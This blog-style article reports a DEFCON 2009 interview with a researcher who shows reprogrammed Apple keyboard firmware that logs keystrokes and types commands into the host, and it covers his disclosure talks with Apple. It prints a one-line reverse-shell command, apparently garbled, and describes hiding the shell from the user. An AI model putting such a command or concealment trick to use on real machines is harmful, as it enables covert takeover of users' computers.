I got a chance to interview the security researcher at DEFCON 2009 (another security conference immediately following BlackHat) who discovered this flaw. The researcher explained that he goes by the name “K. Chen” because he feared harassment from staunch Apple fans who actually believe those Mac versus PC security commercials. In the video below, I had Mr. Chen demonstrate his possessed keyboard on my computer which had no special software installed. The keyboard would actually spit out in reverse order what had been typed into it whenever the ENTER key was pressed. This showed that the keyboard was indeed modified with special firmware which can record what was typed and inject it back into the host computer. This key logging capability can even work during the boot phase which would unlock additional hardware encryption features.
Once this keyboard is possessed by an attacker, the keyboard can easily fire up a bash connect back shell by launching a console and feeding in the following characters:
exec /bin/sh 0&0 2>&0This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed. While this process would be visible to the human user while it’s happening, that risk would be minimized by waiting through an hour of no keyboard inactivity and a simple “Open Apple + M” key stroke would minimize the console shell hiding its actions further.
What all this basically means is that this keyboard can betray any computer it attaches to by:
- Recording your password keystrokes
- Deliver your computer into the attacker’s hands
- Re-infect your computer if your computer’s hard drive was completely wiped
Mr. Chen also explained that he had been working with Apple to come up with a solution, but that he feared Apple may be selecting the weaker fix by only blocking future revisions of Mac OS X from infecting the keyboard. This would not prevent the keyboard from being hacked by another computer running something other than the latest version of Mac OS X nor does it guarantee that a patched Mac OS X computer can’t bypass the proposed protections. The cleaner solution Mr. Chen is proposing is that Apple should simply lock the Keyboard firmware from any future modifications since the keyboard doesn’t implement any digital signature protection.
I asked Mr. Chen why Apple would leave the firmware open and he explained that Apple had a tendency to rush hardware to market which has resulted in shipped keyboards with flaws that needed firmware updates. But because the keyboards are already more mature today; perhaps it wouldn’t be a bad idea for Apple to lock in the firmware. I then asked Mr. Chen if he could produce a utility for consumers to lock their own keyboards and he said yes, but he would rather wait for Apple’s finalized solution first. If the Apple solution is inadequate, then he might revisit the possibility of producing a keyboard firmware locking utility. Until such time, buyers considering Apple keyboards have been warned.